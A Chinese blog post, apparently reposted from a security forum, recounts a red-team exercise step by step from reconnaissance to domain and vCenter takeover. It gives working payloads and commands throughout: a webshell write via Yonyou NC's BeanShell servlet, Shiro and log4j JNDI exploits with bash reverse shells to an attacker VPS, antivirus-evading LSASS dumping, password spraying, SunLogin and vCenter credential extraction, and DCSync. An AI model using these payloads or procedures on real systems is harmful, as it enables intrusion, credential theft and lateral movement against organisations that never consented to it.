记一次攻防演练实战总结

青旅半醒 2024-04-03 12:36 40阅读 0赞

### 0x01 外网打点 ###

### 资产发现 ###

**多测绘平台搜索**

[https://hunter.qianxin.com/][https_hunter.qianxin.com][https://fofa.info/][https_fofa.info][https://quake.360.cn/][https_quake.360.cn]

![image\_X8BSXnkylx.png][image_X8BSXnkylx.png]

![image\_ctJSWbXB6F.png][image_ctJSWbXB6F.png]

**多语法搜索**

假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集，搜集的资产会更全面  
这里以fofa为例

domain="xxxx.com"  
    host="xxxx.com"  
    header="xxxx.com"  
    cert="xxxx.com"

### 敏感信息泄露 ###

对于学校站点的信息搜集，一般来说外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍，这时候可以通过语法对此类信息进行挖掘

常用命令如下：

#google语法  
    site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码  
      
    #github  
    *.edu.cn password

![image\_22dBsSWKAO.png][image_22dBsSWKAO.png]

在这次攻防演练里，也是幸运找到了某站点VPN的默认口令，使用的是 `姓名拼音/12345678` 弱口令

![image\_i-KtUIqFmy.png][image_i-KtUIqFmy.png]

### 默认口令 ###

对于部分站点，在搭建完成后可能没有更改默认账号密码，这时候可以尝试使用默认账密登录

下面列举一些常见的web站点默认口令

账号：  
    admin administrator root user test  
      
    密码：  
    admin admin123123456 123 test root

对于一些应用广泛的系统，可以通过google语法搜索其默认密码

![image\_ejxlTxW5Av.png][image_ejxlTxW5Av.png]

这里通过`sysadmin/1` 成功登入泛微后台

![t1sb-w5grl\_9Xl3mB\_bqn.png][t1sb-w5grl_9Xl3mB_bqn.png]

`nacos/nacos`

![image-20220723225803735.png][]

### 常见漏洞利用 ###

对于多目标的攻防演练，个人比惯把目标子域url搜集好，去重后批量导进去指纹识别工具，如Goby、fofahub

从指纹识别结果里筛选出重要资产进行突破，使用已知漏洞或day进行攻击

以下为一些批量漏洞利用工具：

[https://github.com/Anonymous-ghost/AttackWebFrameworkTools-5.0][https_github.com_Anonymous-ghost_AttackWebFrameworkTools-5.0][https://github.com/d3ckx1/Fvuln][https_github.com_d3ckx1_Fvuln][https://github.com/W01fh4cker/Serein][https_github.com_W01fh4cker_Serein]

框架类的如log4j、shiro、struts2等

OA类的如致远、泛微、用友、蓝凌等，这里也是找到了目标的用友nc站点

#### 用友nc写shell ####

![56xk-0ba58\_-A3uKrDLZX.png][56xk-0ba58_-A3uKrDLZX.png]

访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令

![d5lhwsk0r8\_WfpuDtbLpm.png][d5lhwsk0r8_WfpuDtbLpm.png]

dnslog探测了一下发现不出网，这里直接写入webshell

1、首先生成一个哥斯拉的jsp木马，然后进行unicode编码

![image\_796oyMMBO3.png][image_796oyMMBO3.png]

2、再把输出结果进行url编码

![image\_zZUpiKMWn1.png][image_zZUpiKMWn1.png]

3、payload字段如下，这里写入默认路径为 webapps/nc\_web ，实战中灵活应变

String keyWord = URLDecoder.decode("xxxxxx(填入生成内容)xxxxxx", "utf-8");    
    BufferedWriter out = new BufferedWriter(new FileWriter("/webapps/nc\_web/test.jsp"));  
    out.write(keyWord);  
    out.close();

这里直接写入哥斯拉马，连接成功

![b8xw2a-s9d\_hjEIes\_edE.png][b8xw2a-s9d_hjEIes_edE.png]

#### shiro无依赖链利用 ####

通过测绘平台找到一个比较偏的资产，直接访问是一个静态页面，但扫描目录后指纹识别一波发现是shiro

直接使用shiro\_attack\_2.2工具开冲，发现有默认key但是无利用链

![image\_ylgMY223mT.png][image_ylgMY223mT.png]

可能有些人看到这里就放弃了，但这可能会错过一个利用点

shiro可以无依赖链利用，感觉有戏尝试一波，相关知识可拜读师傅的文章[https://www.le1a.com/posts/a5f4a9e3][https_www.le1a.com_posts_a5f4a9e3]

这里换用其他工具

![image-20220607115446156\_b9JXMk\_Qxy.png][image-20220607115446156_b9JXMk_Qxy.png]

通过dnslog测试有回显，这里有个注意点：使用 [http://dnslog.cn/][http_dnslog.cn] 部分站点会拦截，可以换多个dnslog平台测试

![image\_htB\_EhwPH9.png][image_htB_EhwPH9.png]

dnslog有回显接下来就是拿shell了，这里由于固定思维，之前遇到的都是linux系统，先入为主觉得是Linux，结果没利用成功，一开始以为是防火墙拦截，后面探测了一下目录结构，发现是windows，所以这里payload要改变一下

这里可以通过网站快速生成payload[https://x.hacking8.com/java-runtime.html][https_x.hacking8.com_java-runtime.html]

Linux：
    java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"  
    字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值  
    nc -lvp 端口
    
    Windows：
    java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址  
    java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"  
    d2hvYW1p为命令的base64，这里是执行命令whoami

![image\_wvD-c4KvV-.png][image_wvD-c4KvV-.png]

### 0x02 内网渗透 ###

### 杀软识别 ###

拿到一台机器后，一般先看一下安装了什么安全防护产品

`tasklist /svc`

![\-rr-ew4zvx\_bjnBTV1EhH.png][-rr-ew4zvx_bjnBTV1EhH.png]

探测了一下发现安装了360，把之前准备好的bypass360马子扔上去，成功上线

![chm2qtadrh\_QYKNvySqi7.png][chm2qtadrh_QYKNvySqi7.png]

### 隧道搭建 ###

ping了一下发现机器出网，可以上frp搭建反向代理隧道

![7brv9u2oe7\_ljYwWodDhg.png][7brv9u2oe7_ljYwWodDhg.png]

proxifier配置相应的端口账密便可以进入内网

![h0a0j4rf5-\_22woqcMQL4.png][h0a0j4rf5-_22woqcMQL4.png]

### 横向思路 ###

1、优先拿运维机器，一般存放着大量的账号密码信息

2、其次是集权设备，Vcenter、堡垒机、天擎这些，有day上day，没day寻找其他方法

3、有域的情况下，争取拿到域管hash，或者通过已知漏洞拿下域控

### 横向移动 ###

在扫描之前，可以先通过netspy筛选可达的网段再进行扫描

[https://github.com/shmilylty/netspy][https_github.com_shmilylty_netspy]

![image\_aAWQmEgoLW.png][image_aAWQmEgoLW.png]

接着上fscan对可达各个C段开扫，追求效率可只扫描22、80、443、445、1433、8080等重点端口

由于扫描会引起安全设备告警，因此横向尽可能在一小时内结束，避免入口机器被关机下线，对于拿到的机器可以通过计划任务进行维权，尽可能多拿几台机器保证口子不会掉，拿到机器后继续做信息搜集，网段，机器信息，敏感文件，xshell、navicat密码等常规的这里就不细说了

#### dump lssas ####

正常没有杀软我们可以通过mimikatz抓取密码

但很多时候mimikatz会被拦截，这时候可以通过一些LOLBINS方法dump出来本地解

![image\_xvtqu2JT5W.png][image_xvtqu2JT5W.png]

这里使用的dump64.exe为白程序，位置位于

`C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\`

`dump64.exe pid c:\\users\\xxx\\Desktop\\out.dmp`

测试可过360和火绒

![image\_w7zffbKEzi.png][image_w7zffbKEzi.png]

![image\_x0lqYBmjQ2.png][image_x0lqYBmjQ2.png]

#### 密码复用 ####

08机器之前可以抓到明文，抓不到明文可以尝试到cmd5上进行破解，破解率较高

[https://www.cmd5.com][https_www.cmd5.com][https://www.somd5.com][https_www.somd5.com]

获取密码之后可以通过超级弱口令工具进行密码复用爆破，拿着获取的密码重新组合字典，对网段内的机器进行爆破，这次也是成功拿下了几十台机器

![image\_B-HbFja15K.png][image_B-HbFja15K.png]

若hash解不出来，这时候我们可以根据开放的端口进行PTH，下面列举一些

wmiexec135端口  
    psexec   445端口  
    evil-winrm   5985端口

#### 向日葵读取密码 ####

拿到机器的账号密码之后，若机器开启了3389端口可以选择rdp远程桌面过去，没开的话可以开启3389端口进行远程连接

#执行以下命令操作注册表来开启机器3389远程桌面服务  
    REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG\_DWORD /d 00000000 /f  
    
    #使用以下命令添加防火墙放行策略  
    netsh firewall add portopening protocol = TCP port = 3389 name = rdp

但如果是正常办公时间，贸然登录过去会很容易引起对方的发现，若进程中有sunlogin进程，可以读取识别码和验证码，通过向日葵连接相对比较隐蔽

![duk5gbct0f\_meMyYaCbN7.png][duk5gbct0f_meMyYaCbN7.png]

注册表读取配置信息：

reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo  
    reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo  
    
    向日葵默认配置文件路径:  
    安装版：C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini  
    便携版：C:\\ProgramData\\Oray\\SunloginClient\\config.ini  
    本机验证码参数：encry\_pwd  
    本机识别码参数：fastcode(去掉开头字母)  
    sunlogincode：判断用户是否登录状态

读注册表：

![glkpzmabud\_771pPqH2eN.png][glkpzmabud_771pPqH2eN.png]

读默认配置文件：

fastcode去掉前面的数字k为本机识别码`278263893`

![0k5feqz515\_ejswLYRqVy.png][0k5feqz515_ejswLYRqVy.png]

使用脚本进行解密获得本机验证码

![r10bnuf1d3\_sY377ayb3l.png][r10bnuf1d3_sY377ayb3l.png]

#### 运维机 ####

横向的时候优先拿运维机，一般运维机存储着大量的账号密码信息，比如这次无意中发现的运维机器使用的是弱口令`administrator/111111`

另外还可以通过cs插件查看机器历史登录IP对运维人员进行锁定

拿下后可通过命令行快速收集服务器、网络拓扑、密码本、公司信息等重要文件。

dir /a /s /b d:\\" \*.txt"   
    dir /a /s /b d:\\"\* pass \*"   
    dir /a /s /b d:\\"\* login \*"   
    dir /a /s /b d:\\"\* user \*"  
    dir /a /s /b c:\\password.txt  
    dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config   
    dir /a /s /b c:\\conf.\* config.\*   
    dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "拓扑"  
    dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config | findstr "运维"  
    dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "密码" >C:\\Users\\1.txt

最后收集了一堆密码本，可登录到各重要系统：

H3C堡垒机

![ilyp6ixpq1\_a6ILzCKmfM.png][ilyp6ixpq1_a6ILzCKmfM.png]

禅道

![a680cz-6mv\_TJX707htOa.png][a680cz-6mv_TJX707htOa.png]

#### 域控 ####

1、通过fscan扫描的时候可以检索AD关键字发现域控

[*]192.168.10.38 #非真实域控ip  
       [->]D1-Prod-AD-P01  
       [->]192.168.10.38  
         
    [*]192.168.10.20 #非真实域控ip  
       [->]AD  
       [->]192.168.10.20

2、域内主机 DNS 一般就是域控地址

接着可以通过该机器是否开放53和389端口进行进一步确认

这次攻防演练的其中一个目标，通过密码复用爆破成功的某台机器里，刚好存在着域管进程，提权到system权限后注入到域管进程，通过Dcsync成功获取域管密码的hash值，其中一个被禁用的账户刚好可以通过cmd5解出，解出明文密码并激活账户，成功登录两台域控机器，除此以外还可以尝试域漏洞、NTLM中继等

net group"domain admins" /domain  
    dcsync domain xxxx  
    shell net user xxxx  
    shell net user xxxx /active:yes /domain

![image\_CbIuSx-DB0.png][image_CbIuSx-DB0.png]

![image\_lKpb0bidqu.png][image_lKpb0bidqu.png]

#### Vcenter ####

在扫描的过程中发现几台Vcenter，Vcenter常规有三种打法，分别是

CVE-2021-22005-rce、CVE-2021-21972-rce和log4j

前两个测试没成功，log4j通过dnslog探测漏洞存在，vcenter的漏洞触发点在xff头部

java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1389 -p 8889 -i 0.0.0.0  
    nc -lvp 9000  
    ${jndi:ldap://VPSIP:1389/Deserialization/CommonsBeanutils1/ReverseShell/VPSIP/9000}

![4s6zq8tgso\_dj3CuwYEQo.png][4s6zq8tgso_dj3CuwYEQo.png]

![styrmfmfl2\_AgaGTkpKg8.png][styrmfmfl2_AgaGTkpKg8.png]

但一般打完是非交互式shell，没有回显，这里使用命令切换为交互式shell

`python -c 'import pty;pty.spawn('/bin/bash')'`

重置密码

`/usr/lib/vmware-vmdir/bin/vdcadmintool`

**不重置密码获取密码**

[https://github.com/shmilylty/vhost\_password\_decrypt][https_github.com_shmilylty_vhost_password_decrypt]

#获取vc用户的密码  
    cat /etc/vmware-vpx/vcdb.properties  
      
    #把加密后的密码单独拿出来，  
    psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip\_address,user\_name,password from vpx\_host;" > password.enc  
    #改成这种格式\*  
    H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==\*  
    zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==\*  
    Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==\*  
    R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==  
      
    #拿解密key  
    cat /etc/vmware-vpx/ssl/symkey.dat  
    Windows：C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\ssl\\symkey.dat  
    Linux：/etc/vmware-vpx/ssl/symkey.dat  
      
    #破解  
    python decrypt.py symkey.dat password.enc pass.txt

然后就可以登入web控制台了

![1r01obzkhj\_ogBBaw34kH.png][1r01obzkhj_ogBBaw34kH.png]![wrhrlq1\_b0\_FPzcE7l\_qW.png][wrhrlq1_b0_FPzcE7l_qW.png]

#### 云管平台 ####

通过运维机的xshell查找历史记录拿下了主备数据库，然后执行sql语句成功获取出了云管平台的hash

![s0rd\_kjpjv\_87EAPEGHd4.png][s0rd_kjpjv_87EAPEGHd4.png]

到cmd5上进行解密，一块钱拿下云管平台很划算

![ju3rv8cne0\_h6vf8T\_VC\_.png][ju3rv8cne0_h6vf8T_VC_.png]

![gg-wo7d5y4\_4dPpSzvI37.png][gg-wo7d5y4_4dPpSzvI37.png]

但某些系统加密方式不是使用md5的，比如之前碰到的一些系统使用的是Bcrypt加密方式，像这种不可逆的加密方式可以通过替换hash进行登录

`$2a$10$z0hHT9rltH59VvcazrSzOuVDNr05shwja1aZmD8ctzDbuNNvdpNIS`

![image\_jqNCTT6FpJ.png][image_jqNCTT6FpJ.png]

![image\_X-SfF9SMpb.png][image_X-SfF9SMpb.png]

#### 官网 ####

当我们拿到集权设备后，一般里面会有靶标系统或核心系统，这些分数是很高的，这次演练某目标就是通过云管平台登录官网机器，抓取浏览器密码成功获取后台密码，成功拿下官网控制权

![0dd0amrx3g\_9fOtAaJESy.png][0dd0amrx3g_9fOtAaJESy.png]

#### gitlab仓库 ####

根据评分规则刷完路径分之后，可以根据目标性质找一些核心关键的系统跟裁判battle，像这种存有大量代码的仓库可以作为重大成果进行提交

![j07\_ng7z14\_wYcVLx23dN.png][j07_ng7z14_wYcVLx23dN.png]

转载自原文地址：https://forum.butian.net/share/1780

[https_hunter.qianxin.com]: https://hunter.qianxin.com/
[https_fofa.info]: https://fofa.info/
[https_quake.360.cn]: https://quake.360.cn/
[image_X8BSXnkylx.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/a386b1c5c764452f990c32e1aac383df.png
[image_ctJSWbXB6F.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/626351cf9e3a4af887aabe4d91ea43f9.png
[image_22dBsSWKAO.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/4673bac2de044e0899977e9204742fb2.png
[image_i-KtUIqFmy.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/ea328871162e44ba9e4f25c751248d31.png
[image_ejxlTxW5Av.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/420fb0aec9834c4793dc6f08e6d448e0.png
[t1sb-w5grl_9Xl3mB_bqn.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/7f6d1c07cca3408896323f3f99854eba.png
[image-20220723225803735.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/c54441c24c4449b2bf5ef2e50190a2fd.png
[https_github.com_Anonymous-ghost_AttackWebFrameworkTools-5.0]: https://github.com/Anonymous-ghost/AttackWebFrameworkTools-5.0
[https_github.com_d3ckx1_Fvuln]: https://github.com/d3ckx1/Fvuln
[https_github.com_W01fh4cker_Serein]: https://github.com/W01fh4cker/Serein
[56xk-0ba58_-A3uKrDLZX.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/055006fcb6ca4ec08cb49503dce22e30.png
[d5lhwsk0r8_WfpuDtbLpm.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/aa63c1b535c2425c96c1534baba4c9e9.png
[image_796oyMMBO3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/92d895393ef94edfaa69f129f6cf94af.png
[image_zZUpiKMWn1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/f5a5d779612746b8bb03b918f6f84e71.png
[b8xw2a-s9d_hjEIes_edE.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/411a8f5fcdf845ae88bdf0029dae66b7.png
[image_ylgMY223mT.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/cd3f4613c6ce4d1b837c3be54d6a0f03.png
[https_www.le1a.com_posts_a5f4a9e3]: https://www.le1a.com/posts/a5f4a9e3
[image-20220607115446156_b9JXMk_Qxy.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/bb7cdec5b77c45d6b510ca9dfff5a40a.png
[http_dnslog.cn]: http://dnslog.cn/
[image_htB_EhwPH9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/5f5235b6f79e4106a8cbbc0f3206f062.png
[https_x.hacking8.com_java-runtime.html]: https://x.hacking8.com/java-runtime.html
[image_wvD-c4KvV-.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/02dd6274b2474b69b128f8c578c1e21a.png
[-rr-ew4zvx_bjnBTV1EhH.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/fef15e1af68544f19739d8384a1b2014.png
[chm2qtadrh_QYKNvySqi7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/47d61ab052694bb1bfede88ca8e35be7.png
[7brv9u2oe7_ljYwWodDhg.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/b3f6eb135c5541019b4afa72fe985ab6.png
[h0a0j4rf5-_22woqcMQL4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/29923c66a67c48c699a128fe70ba52c3.png
[https_github.com_shmilylty_netspy]: https://github.com/shmilylty/netspy
[image_aAWQmEgoLW.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/94c732ae6e54492eb218f6fe3b326b2e.png
[image_xvtqu2JT5W.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/32484a52339740e3a0654897675e8eec.png
[image_w7zffbKEzi.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/48dc13c1195341698e3025c635544818.png
[image_x0lqYBmjQ2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/ee84efb696fe4f2299d4260ffb893531.png
[https_www.cmd5.com]: https://www.cmd5.com/
[https_www.somd5.com]: https://www.somd5.com/
[image_B-HbFja15K.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/42ae5c4588e54517a2150a16fcf5a446.png
[duk5gbct0f_meMyYaCbN7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/55bbbfdca7844f908c7024691f0a489d.png
[glkpzmabud_771pPqH2eN.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/c0e407b01ff343d6a82336c4c040b9a2.png
[0k5feqz515_ejswLYRqVy.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/788d9ee90ca84a66ae864d309809e24b.png
[r10bnuf1d3_sY377ayb3l.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/3649d37ee0394f77819af9c882089130.png
[ilyp6ixpq1_a6ILzCKmfM.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/774715502e994641bd5d71a63cef44b8.png
[a680cz-6mv_TJX707htOa.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/130c7047ed3d4a808c9d961dac5eab3b.png
[image_CbIuSx-DB0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/233e84201d2c4a8f8f10605007b91a8f.png
[image_lKpb0bidqu.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/84138edc57244791978ae35775aaf9fa.png
[4s6zq8tgso_dj3CuwYEQo.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/ef7101a270684c85a7f23fee8f9bd837.png
[styrmfmfl2_AgaGTkpKg8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/c49d5f26e2694862826f820eec0629f9.png
[https_github.com_shmilylty_vhost_password_decrypt]: https://github.com/shmilylty/vhost_password_decrypt
[1r01obzkhj_ogBBaw34kH.png]: https://img-blog.csdnimg.cn/img_convert/be2ea21618316bb40dbf56d62208c25b.png
[wrhrlq1_b0_FPzcE7l_qW.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/3a74b90a2dda432ab13b9f553a97998d.png
[s0rd_kjpjv_87EAPEGHd4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/9434c20663144dd98d17801e3278ed86.png
[ju3rv8cne0_h6vf8T_VC_.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/eadc3a7400f447b09d3d72e32ac0dd36.png
[gg-wo7d5y4_4dPpSzvI37.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/20cf5dba98ae48a58c45c4bc726d581d.png
[image_jqNCTT6FpJ.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/5b45aa50f6d244d99dd3843b890d090b.png
[image_X-SfF9SMpb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/ab7e24421c6f44c08d56fcc1e51ec5a4.png
[0dd0amrx3g_9fOtAaJESy.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/76bac23fec004623a79af967dc521069.png
[j07_ng7z14_wYcVLx23dN.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/6ebd1b899ec749f88828db67a901f26c.png